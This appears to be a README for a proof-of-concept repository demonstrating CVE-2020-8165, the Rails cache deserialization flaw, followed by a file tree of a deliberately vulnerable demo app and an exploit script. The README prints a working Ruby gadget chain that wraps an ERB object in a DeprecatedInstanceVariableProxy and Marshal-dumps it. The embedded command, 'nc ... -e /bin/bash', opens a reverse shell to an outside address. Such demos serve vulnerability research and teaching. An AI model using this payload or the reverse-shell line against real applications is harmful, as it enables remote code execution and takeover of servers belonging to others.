# CVE-2020-8165 Demo
Yet another demo of CVE-2020-8165, though in a more realistic implementation than most.
## Background
*CVE-2020-8165*
> A deserialization of untrusted data vulnernerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.
### References
- https://hackerone.com/reports/413388
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
- https://nvd.nist.gov/vuln/detail/CVE-2020-8165
- https://www.cvebase.com/cve/2020/8165
- https://lab.wallarm.com/exploring-de-serialization-issues-in-ruby-projects-801e0a3e5a0a/
## Implementation
The "Shouter" app has a caching feature in its `Shout` model where optional images that are submitted with a shout:string are cached in redis and retrieved from there rather than the DB. Because the vulnerable `Rails.cache.fetch` method is used to interact with the cache, this app is susceptible to CVE-2020-8165, and the results of the RCE are placed in the src of the `img` tags in the dashboard route.
### Generating RCE payloads
The following snippet will generate the payload you need to send using `exploit.py`. There's some nuance with the serialization step that needs to be figured out to implement the exploit fully Python. Hence, `Marshal.dump` in Ruby is needed to generate the exact payload (for now).
```ruby
cmd = "Thread.new{system('nc 172.17.188.169 3001 -e /bin/bash')}"
erb = ERB.allocate
erb.instance_variable_set(:@src, cmd)
erb.instance_variable_set(:@lineno, 0)
payload_raw = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
payload = Marshal.dump(payload_raw)
p payload
```
[4.0K] /data/pocs/1ef68929e8e294f95236cb1a9ddbf72b02acfd64
├── [4.0K] app
│ ├── [4.0K] app
│ │ ├── [4.0K] assets
│ │ │ ├── [4.0K] config
│ │ │ │ └── [ 101] manifest.js
│ │ │ ├── [4.0K] images
│ │ │ ├── [4.0K] javascripts
│ │ │ │ ├── [ 721] application.js
│ │ │ │ ├── [ 360] cable.js
│ │ │ │ ├── [4.0K] channels
│ │ │ │ └── [ 211] shout.coffee
│ │ │ └── [4.0K] stylesheets
│ │ │ ├── [ 709] application.css
│ │ │ └── [ 267] shout.scss
│ │ ├── [4.0K] channels
│ │ │ └── [4.0K] application_cable
│ │ │ ├── [ 79] channel.rb
│ │ │ └── [ 85] connection.rb
│ │ ├── [4.0K] controllers
│ │ │ ├── [ 57] application_controller.rb
│ │ │ ├── [4.0K] concerns
│ │ │ └── [ 763] shouts_controller.rb
│ │ ├── [4.0K] helpers
│ │ │ └── [ 29] application_helper.rb
│ │ ├── [4.0K] jobs
│ │ │ └── [ 43] application_job.rb
│ │ ├── [4.0K] mailers
│ │ │ └── [ 102] application_mailer.rb
│ │ ├── [4.0K] models
│ │ │ ├── [ 78] application_record.rb
│ │ │ ├── [4.0K] concerns
│ │ │ └── [ 389] shout.rb
│ │ └── [4.0K] views
│ │ ├── [4.0K] layouts
│ │ │ ├── [ 559] application.html.erb
│ │ │ ├── [ 229] mailer.html.erb
│ │ │ └── [ 13] mailer.text.erb
│ │ └── [4.0K] shouts
│ │ └── [ 683] dashboard.html.erb
│ ├── [4.0K] bin
│ │ ├── [ 125] bundle
│ │ ├── [ 264] rails
│ │ ├── [ 213] rake
│ │ ├── [ 957] setup
│ │ ├── [ 507] spring
│ │ ├── [ 819] update
│ │ └── [ 303] yarn
│ ├── [4.0K] config
│ │ ├── [ 654] application.rb
│ │ ├── [ 207] boot.rb
│ │ ├── [ 185] cable.yml
│ │ ├── [ 464] credentials.yml.enc
│ │ ├── [ 594] database.yml
│ │ ├── [ 128] environment.rb
│ │ ├── [4.0K] environments
│ │ │ ├── [2.1K] development.rb
│ │ │ ├── [3.8K] production.rb
│ │ │ └── [1.8K] test.rb
│ │ ├── [4.0K] initializers
│ │ │ ├── [ 216] application_controller_renderer.rb
│ │ │ ├── [ 630] assets.rb
│ │ │ ├── [ 404] backtrace_silencers.rb
│ │ │ ├── [1.1K] content_security_policy.rb
│ │ │ ├── [ 244] cookies_serializer.rb
│ │ │ ├── [ 194] filter_parameter_logging.rb
│ │ │ ├── [ 647] inflections.rb
│ │ │ ├── [ 156] mime_types.rb
│ │ │ └── [ 485] wrap_parameters.rb
│ │ ├── [4.0K] locales
│ │ │ └── [ 848] en.yml
│ │ ├── [1.4K] puma.rb
│ │ ├── [ 151] routes.rb
│ │ ├── [ 111] spring.rb
│ │ └── [1.1K] storage.yml
│ ├── [ 130] config.ru
│ ├── [4.0K] db
│ │ ├── [4.0K] migrate
│ │ │ └── [ 176] 20210215164125_create_shouts.rb
│ │ ├── [ 966] schema.rb
│ │ └── [ 370] seeds.rb
│ ├── [2.1K] Gemfile
│ ├── [5.0K] Gemfile.lock
│ ├── [4.0K] lib
│ │ ├── [4.0K] assets
│ │ └── [4.0K] tasks
│ ├── [4.0K] log
│ ├── [ 61] package.json
│ ├── [4.0K] public
│ │ ├── [1.7K] 404.html
│ │ ├── [1.7K] 422.html
│ │ ├── [1.6K] 500.html
│ │ ├── [ 0] apple-touch-icon.png
│ │ ├── [ 0] apple-touch-icon-precomposed.png
│ │ ├── [ 0] favicon.ico
│ │ └── [ 98] robots.txt
│ ├── [ 227] Rakefile
│ ├── [ 374] README.md
│ ├── [4.0K] storage
│ ├── [4.0K] test
│ │ ├── [ 157] application_system_test_case.rb
│ │ ├── [4.0K] controllers
│ │ │ └── [ 135] shouts_controller_test.rb
│ │ ├── [4.0K] fixtures
│ │ │ ├── [4.0K] files
│ │ │ └── [ 137] shouts.yml
│ │ ├── [4.0K] helpers
│ │ ├── [4.0K] integration
│ │ ├── [4.0K] mailers
│ │ ├── [4.0K] models
│ │ │ └── [ 119] shout_test.rb
│ │ ├── [4.0K] system
│ │ └── [ 290] test_helper.rb
│ ├── [4.0K] tmp
│ └── [4.0K] vendor
├── [ 498] docker-compose.yml
├── [ 353] Dockerfile
├── [ 979] exploit.py
└── [1.7K] README.md
44 directories, 74 files